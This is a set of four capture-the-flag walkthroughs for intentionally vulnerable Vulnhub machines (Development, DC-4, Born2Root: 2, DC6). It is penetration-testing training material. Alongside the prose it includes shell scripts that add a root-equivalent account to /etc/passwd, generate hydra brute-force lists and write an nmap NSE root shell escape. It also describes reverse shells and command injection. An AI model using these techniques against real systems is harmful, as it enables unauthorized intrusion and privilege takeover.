Development: Vulnhub Walkthrough

Today we are going to take on another challenge known as “DEVELOPMENT”. It is designed for OSCP practice; the original version of the machine was used for a CTF and has now been revived and made slightly more nefarious than the original. The author of this VM is “Donavan”. Our goal is to get the flag to complete the challenge.

Download it from here: https://download.vulnhub.com/digitalworld/devt-improved.7z

Security Level: Intermediate

Penetrating Methodology:

Scanning

  • Netdiscover
  • NMAP

Enumeration

  • Browsing the HTTP service
  • Web spidering

Exploiting

  • Remote File Inclusion
  • SSH login

Privilege Escalation

  • Exploit sudo rights
  • Adding a new user

Capture the Flag

Walkthrough

Scanning:

Let’s start off by scanning the network to identify the target. As illustrated below, the target’s IP is 192.168.1.104.

Time to scan the Target’s IP with Nmap.

From the screenshot we can clearly see a few open ports: 22 (ssh), 139 (netbios-ssn), 445 (netbios-ssn) and 8080 (http-proxy).

Enumeration

Since port 8080 is serving HTTP, the obvious choice is to browse the target’s IP on that port. Here we got a clue about html_pages, which could be a directory or a page.

So let’s dig into the source code for something useful. It mentions a Development secret page and a person named Patrick, who could be a user:

Moving on, let’s browse to html_pages. It lists a few HTML files, of which “development.html” looks interesting.

development.html mentions “hackersecretpage”; nothing else looks useful.

Its source, however, contains “./developmentsecretpage”, which seems to be our secret page.

Visiting it confirms the Development secret page and offers a PHP file link named ‘Patrick’.

That page in turn includes another file named ‘Sitemap’.

On /sitemap.php we clicked the embedded “Click here to logout” link, which turned out to be a login page.

Exploitation

We tried guessable credentials (admin/admin, then admin/1234) and got in.

A short error message appears at the top of the page, so we Googled it.

The search led to an Exploit-DB entry for it: the entry lists “/[path]/slog_users.txt” as reachable through file inclusion (CVE-2008-5762 and CVE-2008-5763).

Appending slog_users.txt to the page’s URL gave us four users and their password hashes.

After cracking the hashes we had clear-text passwords for intern, Patrick and qiu, but not for Admin.

Privilege Escalation

As we knew port 22 is open for SSH, I tried logging in as intern, and it worked, as shown below. On login we were given a list of commands we are allowed to run. Listing the directory with ‘ls’ (one of the allowed commands) showed two text files, ‘local.txt’ and ‘work.txt’, but trying to open them failed.

Hmm! We have landed in a restricted shell where only a few admin-approved commands are permitted. To get a proper shell, we invoke /bin/bash from inside the restricted shell:

Next, we try reading ‘local.txt’ again; it is just a congratulatory message, so we moved on to work.txt, which tells us to continue as user Patrick, whose password we already have.

NOTE: On the first attempt you may get an SSH “connection refused” error; restart the vulnerable machine and the SSH connection will work.

After logging in as patrick, we check his sudo rights and find that Patrick may run vim and nano as any user, root included, as shown below.

In another terminal on my local machine, I generated a password hash for pass123 with the salt ignite using OpenSSL and copied the resulting hash.

With sudo access to either editor (vim or nano) we can read and edit any system file that a low-privilege user normally cannot touch, such as /etc/passwd.

Since Patrick can modify root-owned files, I decided to insert a new user with root privileges into /etc/passwd.

As you can see in the screenshot below, we have added a user ‘RAJ’ with the hashed password and UID 0 and GID 0, which makes it equivalent to root.
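The /etc/passwd step above, as an added example that is not code from the original walkthrough: a shell function that builds the root-equivalent entry for a user from a hash produced by OpenSSL, and a second function that audits a passwd file for any UID-0 account other than root, which is the check a defender would run after this kind of compromise. The hash placeholder, the demo file contents and the account names are constructed.

```shell
#!/bin/sh
# Added example, not code from the walkthrough.
# The hash in the demo is a placeholder; on the attacking box it would come from
#   openssl passwd -1 -salt ignite pass123      (-1 = MD5-crypt, -6 = SHA-512)

# passwd_line USER HASH -> a UID 0 / GID 0 entry with /bin/bash as login shell
passwd_line() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# audit_uid0 FILE -> names every UID-0 account that is not "root";
# a non-empty result on a real system is a sign of exactly this backdoor
audit_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Demo against a constructed passwd file (never edit the real one this way
# outside a lab)
demo=$(mktemp)
cat > "$demo" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
patrick:x:1001:1001::/home/patrick:/bin/bash
EOF
passwd_line RAJ '$1$ignite$PLACEHOLDER.HASH' >> "$demo"
echo "UID-0 accounts besides root:"
audit_uid0 "$demo"              # prints: RAJ
rm -f "$demo"
```

On the target the same line is appended with `sudo vim /etc/passwd` or `sudo nano /etc/passwd`; the audit function is what you would run afterwards (or put in a cron job) to spot it.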

Capturing the flag

What are we waiting for? Let’s log in as raj. Listing the root directory turns up proof.txt; we opened it with cat and captured the flag.

Author: Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Ignite Technologies as a Security Analyst. Connect with her here

DC-4 Vulnhub Walkthrough

Today we are going to take another boot2root challenge known as “DC-4”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here

Security Level: Beginner

Penetrating Methodology

Scanning

  • Discovering Targets IP
  • Network scanning (Nmap)

Exploiting

  • Surfing HTTP service port
  • HTTP login credential brute-force (Burp Suite)
  • Command Injection
  • SSH login credential brute-force (Hydra)

Lateral Movement

  • Logging into SSH and Enumerating Directories
  • Obtain credentials in /var/mail directory

Privilege Escalation

  • Check Sudo rights
  • Adding a new user to /etc/passwd with sudo
  • Access root directory
  • Capture the flag

Walkthrough

Scanning

Let’s start off by scanning the network to find our target.

We found the target’s IP address, 192.168.1.101. Our next step is to scan it with nmap.

Exploiting

From the nmap results we found an HTTP service on port 80, so we browsed to the target’s IP address and found an Admin Information Security login page. We clearly need credentials for it; let’s work on that.

We fired up Burp Suite with rockyou.txt as the password list to find a valid login.

Username- admin

After brute-forcing, we found the password for admin, i.e.

Password- happy

We have successfully logged in as admin. Under System Tools, the Command hyperlink looks suspicious, so let’s check it out.

The Command page is useful: it offers a few options to run a command on the server. We used the “list files” option, which listed some files. The hint is that this option actually executes ls -l, so the request probably carries the command itself and we may be able to change it.

So we captured the request with Burp Suite and sent it to Repeater, where we can modify the request and inspect the response.
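The weakness the Repeater step relies on, as an added example that is not the DC-4 application’s code: a command handler that executes the request parameter as a command line, beside one that only accepts an option name. The function names and the commands behind each option are illustrative.

```shell
#!/bin/sh
# Added example, not the DC-4 application's code: two ways a "run command"
# page can be wired up. Names and commands are illustrative.

# Vulnerable: the value sent by the client *is* the command line. A client that
# changes "ls -l" to "ls -l; cat /etc/passwd" gets both commands executed.
run_command_vulnerable() {
    sh -c "$1"
}

# Hardened: the client picks an option name; the server owns the command line.
# Anything that is not an exact option name, including "ls; id", is rejected.
run_command_safe() {
    case "$1" in
        ls)   ls -l ;;
        df)   df -h ;;
        *)    printf 'rejected option: %s\n' "$1" >&2; return 1 ;;
    esac
}

# Demo with a constructed "request parameter"
param='echo listing; echo attacker-controlled'
echo "vulnerable handler:"; run_command_vulnerable "$param"
echo "hardened handler:";   run_command_safe "$param" || echo "(blocked)"
```

The hardened form is also why a web application should never pass request data to a shell: even quoting the parameter leaves the server executing a string the client chose.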

Let’s look at the subdirectories under /home. There are three users: charles, jim and sam.

Exploring jim’s home directory, we checked the backups folder.

There we found old-passwords.bak, a backup of old passwords.

Its contents are a list of passwords; they might come in handy later.

We also checked whether /etc/passwd is readable, and it is, giving us some useful usernames.

We created a user list and a password list from what we had discovered and brute-forced the SSH login with hydra.
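The list-building step, as an added example that is not part of the original write-up: an awk filter that keeps only the /etc/passwd accounts that can actually log in, and a helper that writes hydra’s -L and -P files and prints the command to run. The passwd lines and the old-passwords.bak contents in the demo are constructed, and the target address is whatever the caller passes in.

```shell
#!/bin/sh
# Added example, not part of the DC-4 write-up. Input files in the demo are
# constructed; the target address is whatever the caller passes in.

# login_users PASSWD -> account names that can actually log in: UID >= 1000,
# not "nobody" (65534), and a shell that is not nologin/false
login_users() {
    awk -F: '$3 >= 1000 && $3 != 65534 && $7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# build_lists PASSWD BACKUP OUTDIR TARGET -> writes OUTDIR/users.txt and
# OUTDIR/pass.txt and prints the hydra command line to run against TARGET.
# -t 4 keeps the parallelism low enough that sshd does not drop connections.
build_lists() {
    login_users "$1" > "$3/users.txt"
    sort -u "$2" > "$3/pass.txt"        # duplicates only cost extra attempts
    printf 'hydra -L %s/users.txt -P %s/pass.txt ssh://%s -t 4\n' "$3" "$3" "$4"
}

# Demo
d=$(mktemp -d)
cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
charles:x:1001:1001::/home/charles:/bin/bash
jim:x:1002:1002::/home/jim:/bin/bash
sam:x:1003:1003::/home/sam:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
EOF
printf 'password1\nsecret2\npassword1\n' > "$d/old-passwords.bak"
build_lists "$d/passwd" "$d/old-passwords.bak" "$d" 192.168.1.101
echo "users: $(tr '\n' ' ' < "$d/users.txt")"
rm -rf "$d"
```

Filtering out system accounts matters more than it looks: every extra username multiplies the number of SSH attempts, and a noisy brute-force is what gets you locked out (or noticed).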

So, the credentials found:

Login- jim

Password- jibril04

Lateral Movement

Logging into ssh using the credentials.

While enumerating we found two files and read them, but they gave no direct clue.

Opening mbox, I saw a test mail in it sent by root to jim.

After some thought it struck us to check the /var/mail folder in case it contained something, and our instinct was right: we found credentials there.

Privilege Escalation

Let’s log in as charles with the password ^xHhA&hvim0y.

Checking charles’s sudo rights, we found that he can run the teehee binary as root without a password. Since it appends its input to a file, we echoed a new passwd entry for raaj through teehee into /etc/passwd, as shown.

Logging in as raaj gives us a root user, and inside the root directory we found our FINAL FLAG.

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Born2Root: 2: Vulnhub Walkthrough

Hello Friends!! Today we are going to take another CTF challenge named “Born2Root: 2”. The credit for making this VM machine goes to “Hadi Mene”. It is available on the Vulnhub website. Although there is no description provided at the current time on the Vulnhub website, we assume that we will have to gain the root access and find a flag.

Security Level: Intermediate

Penetrating Methodology

  • Scanning
  • Enumeration
  • Exploitation
  • Privilege Escalation
  • Capture the Flag

Walkthrough

Let’s start off with scanning the network to find our target.

We found our target: 192.168.1.9

Time to scan the target’s IP with nmap. The scan shows three ports open: 22 (SSH), 80 (HTTP) and 111 (RPC).

Since port 80 is running HTTP, we opened the target IP address in the browser. It gives us an attractive looking webpage, but after spending a considerable amount of time on it we found it is nothing but a distraction; there is nothing of importance on the site.

So we moved on to directory brute-forcing for hints. The dirb scan gives us a joomla directory, which is a major breakthrough. Now it’s time to exploit the machine through Joomla.

Browsing to the joomla directory we find the author’s blog, titled Tim’s Blog. That could be a hint for a username, so let’s keep it in mind. There is a login form at the bottom right, so we will have to find the user’s credentials.

By convention we try default credentials first. A quick search tells us the default Joomla administrator username is ‘admin’. For the password we perform a dictionary attack, building the dictionary from the words on the webpage with ‘cewl’.

With the dictionary saved as dict.txt, it is time to brute-force. We used Burp Suite for this; to learn more, refer to this article. The brute-force gives us “travel” as the password.
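What cewl does at this step, as an added example that is not part of the original walkthrough: a shell function that turns a saved copy of a page into a de-duplicated wordlist (tags stripped, words shorter than three characters dropped). The HTML in the demo is constructed to contain the password found above; real cewl also follows links to a configurable depth, which this stand-in does not.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: a minimal stand-in for
# the cewl step. The HTML below is constructed.

# page_wordlist HTML_FILE [MINLEN] -> unique words from the page text, one per
# line, in order of first appearance; tags are removed, words shorter than
# MINLEN (default 3) are dropped
page_wordlist() {
    minlen="${2:-3}"
    sed -e 's/<[^>]*>/ /g' "$1" \
      | tr -c '[:alnum:]' '\n' \
      | awk -v m="$minlen" 'length($0) >= m && !seen[$0]++'
}

# Demo
page=$(mktemp)
cat > "$page" <<'EOF'
<html><head><title>Tim's Blog</title></head>
<body><h1>Tim's Blog</h1>
<p>I love to travel. Every trip is a story worth telling.</p>
</body></html>
EOF
page_wordlist "$page" > dict.txt     # feed dict.txt to Burp Intruder
cat dict.txt
rm -f "$page" dict.txt
```

Fetch the page first with curl or wget, then run the function on the saved file; the output is the dict.txt used in the Burp brute-force.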

Now we will use these credentials to login in Joomla:

Now we are logged into Joomla as the Super User. To get code execution we use the PHP reverse shell that ships with Kali Linux. Click Extensions in the menu, open the Templates section, go into the beez3 template and choose Customise. This opens an editor as shown in the image. Select index.php and replace its contents with the reverse shell, remembering to change the IP address and port to match your listener.

Save the file with the Save button; index.php now contains our reverse shell. All that is left is to request index.php so it runs. To catch the connection we need a listener, created with netcat as shown in the image below.

With a shell, it was time to enumerate the machine further. It took a couple of hours of hard work, running a bunch of scripts and much else. The search ended when we stumbled upon /opt: inside it is a scripts directory containing fileshare.py, and on closer inspection that file holds login credentials, as shown in the image.

With the credentials, all that was left was to log in as tim using the su command:

After logging in as tim we ran sudo -l to list his sudo rights. As the image shows, tim may run everything. We then changed into the root directory with cd and found the final flag.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

DC6-Lab Walkthrough

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Download it from here – https://www.five86.com/dc-6.html

Table of Content

  1. Scanning
  • Netdiscover
  • NMAP
  2. Enumeration
  • WPSCAN
  3. Exploiting
  • Searchsploit
  4. Privilege Escalation
  • sudo rights
  5. Capture the Flag

Walkthrough

Here the author has left a clue which will be helpful in this CTF.

OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years. 😉

Scanning

Now, start the CTF challenge by scanning the network and identifying host IPs. As illustrated below, the target’s IP is 192.168.1.103.

Then it’s time to run nmap to identify open ports and running services.

As usual we got ports 22 and 80 open for SSH and HTTP; moreover, the HTTP service redirects to the hostname wordy.

So we added that name to our hosts file (192.168.1.103 wordy in /etc/hosts) so the HTTP service can be reached.

Enumeration

Since port 80 is open, we explored the domain name in the browser and found a WordPress site.

Since there was no remarkable clue on the site, the next idea was to run wpscan against it and see what it enumerates.

Hmmm!! Not bad; it found usernames, as shown in the image below.

I saved all the usernames from WPScan in a text file named users. Remembering the CLUE at the beginning of the post, the password list grep’d out of rockyou.txt is what we need; running wpscan with the users file and passwords.txt found a password.

We have successfully found the password for mark; let’s make good use of it.

mark:helpdesk01

Exploiting

After logging into WordPress, I noticed an Activity Monitor plugin installed in the dashboard.

I quickly checked searchsploit and found this plugin is vulnerable to reflected XSS and CSRF, and that the CSRF can lead to remote code execution. The searchsploit entry is an HTML form that performs the CSRF attack.

The file searchsploit gave me is 45274.html. Before using it we need to make some cosmetic changes as shown below (the target host, and the attacker IP and port for the reverse shell) and launch a netcat listener.

Now open the edited form, saved as shell.html, in the browser that holds the WordPress session to get the reverse connection.

OKAY!! We got a reverse connection at netcat, where I used python to spawn a proper shell. While traversing I found a bash script “backup.sh”, an archive “backups.tar.gz”, and a text file “things-to-do” inside /home/mark/stuff that stores credentials for another user, graham, as shown below.

graham : GSo7isUM1D4

Privilege Escalation

As we know port 22 is open, I tried SSH with graham : GSo7isUM1D4 and luckily got access, as shown below. Since this is a boot-to-root challenge, I need to escalate privileges to root.

So I checked sudo rights and found that graham can execute backup.sh as jens without a password.

After reading this bash script, I edited it to append /bin/bash as shown below.

Then, using the sudo right, I executed it and successfully became jens.

Now with a shell as jens, I checked his sudo rights too. According to the sudoers entry, jens can run nmap as root. To escalate to root, I wrote an nmap script called root.nse that executes /bin/sh, and ran it with sudo nmap.
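The sudo checks in all four walkthroughs (vim and nano for Patrick, teehee for charles, backup.sh and nmap here) follow the same pattern, so here is one added example that is not part of any of the original posts: a shell triage of saved sudo -l output that flags editors, shell-spawning binaries and scripts, plus a helper that writes the one-line NSE script used in this step. The sudo -l text in the demo is constructed; the pattern lists are illustrative, not exhaustive.

```shell
#!/bin/sh
# Added example, not from any of the original posts. The sudo -l output in the
# demo is constructed; the pattern lists are illustrative, not exhaustive.

# sudo_triage FILE -> one line per flagged command from saved `sudo -l` output:
#   <command> (<no-password|password>) <why it matters>
sudo_triage() {
    awk '
        /^ *\(/ {
            nopw = ($0 ~ /NOPASSWD/) ? "no-password" : "password"
            line = $0
            sub(/^ *\([^)]*\) */, "", line)        # drop the "(runas)" prefix
            n = split(line, cmds, /, */)           # several commands can share a line
            for (i = 1; i <= n; i++) {
                c = cmds[i]
                sub(/^([A-Z]+: *)*/, "", c)        # drop tags such as NOPASSWD:
                sub(/ .*/, "", c)                  # keep the binary, not its arguments
                base = c; sub(/.*\//, "", base)
                reason = ""
                if (base ~ /^(vim|vi|nano|teehee|tee)$/) { reason = "writes files as root (e.g. a new UID-0 line in /etc/passwd)" }
                else if (base ~ /^(nmap|python[0-9.]*|perl|bash|sh|less|more|find|awk)$/) { reason = "can spawn a shell" }
                else if (base ~ /\.sh$/) { reason = "script: check whether you can write to it" }
                if (reason != "") print c, "(" nopw ")", reason
            }
        }' "$1"
}

# write_root_nse PATH -> the one-line NSE script from this step; running it with
# `sudo nmap --script=PATH` executes /bin/sh as root
write_root_nse() {
    printf 'os.execute("/bin/sh")\n' > "$1"
    printf 'now run: sudo nmap --script=%s\n' "$1"
}

# Demo
out=$(mktemp)
cat > "$out" <<'EOF'
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backup.sh
    (root) NOPASSWD: /usr/bin/nmap
    (ALL : ALL) /usr/bin/vim, /usr/bin/nano
EOF
sudo_triage "$out"
write_root_nse "$out.nse"
rm -f "$out" "$out.nse"
```

Run `sudo -l > sudo.txt` on the box and feed the file to sudo_triage. The script check is the backup.sh case: a file you can write to and run as another user is as good as running any command as that user.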

WELL DONE! We found the final flag and completed the challenge.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here